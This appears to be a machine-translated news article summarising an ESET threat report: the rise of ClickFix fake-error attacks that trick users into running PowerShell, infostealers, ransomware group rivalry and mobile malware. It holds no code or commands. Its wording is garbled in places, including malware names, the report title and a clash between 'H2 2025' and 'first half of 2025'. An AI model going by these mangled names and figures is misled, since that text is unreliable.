ClickFix fake error message Malware peaks more than 500%, take second place as the most abused attack vector
- Advertisement -
Related Posts
- Advertisement -
- ClickFix is increasingly being used to install Infelealers
- The attack vector saw an increase of 500% in the last 6 months
- Users are told to carry out assignments in Powershell to resolve an error
The use of the ClickFix -Vector has risen by 517% since the second half of 2024, making it the second most abused attack vector behind Phishing.
The attack uses a fake recaptcha to mislead users to make code in a Powershell terminal run as a ‘fix’ for a fake error.
This ensures that malware and info stealers are downloaded and executed on the target device, so that sensitive data is then harvested and extracted to the hackers.
Infoestealers rise
ESETS H2 2025 -DREATION REPORT Explains how ClickFix is abused by hackers to spread some of the most popular information malware, including Lumma Stealer, Vidarstealer, Stealc and Danabot.
The attack vector is so effective because it depends on the use of very simple instructions to mislead users to have complex assignments carried out in the Powershell terminal. Many users will simply ignore or not understand the assignments they carry out, instead aimed at trying to repair the error.
ClickFix is usually distributed via phishing -e emails that send the user to a fake website that is required again to gain recaptcha to gain access. Powershell commands often circumvent antivirus software, making it a particularly effective way to compromise devices, especially if the hacker can cause the user to do it for them.
In other InfoStaler news news, the threat report from ESET shows that Snakestealer Agent Tesla has overtaken as the most detected InfoStaler. Snakestealer was seen that was used in a huge campaign Targeted hundreds of us and EU companies To steal references.
Ransomware gangs experienced an unexpected tumultuous period thanks to the battle and rivalry between different ransomware outfits. The Dragonforce Group launched a spree of defacement campaigns against some of the most notorious ransomware groups, including Blackklock, Mamona and Ransomware-as-a-Service Gigantic Ransomhub.
Although there have been important law enforcement operations against ransomware groups in recent months, including the 8base -attackIt seems that rivalry has caused the most damage to the ransomware ecosystem.
In the field of telephones, the recent wave of kaleidoscope infections have risen by 160%and rare detections. Malware that is distributed via official app stores is nothing new, with the recent Sparkkitty Malware distributed by both the Apple App Store and Google Play Store.
However, the Kaleidoscope malware used a double replacement method by performing intrusive advertisements on the target device to generate advertising income, while also infecting the target devices with malignant twin app that is downloaded via an App Store of third parties.
“From new techniques for social engineering to refined mobile threats and large disturbances from the infontal, the threat landscape in the first half of 2025 was anything but boring,” said Jiří Kropáč ESET Director of Threat Prevention Labs.
Maybe you like it too
- Advertisement -
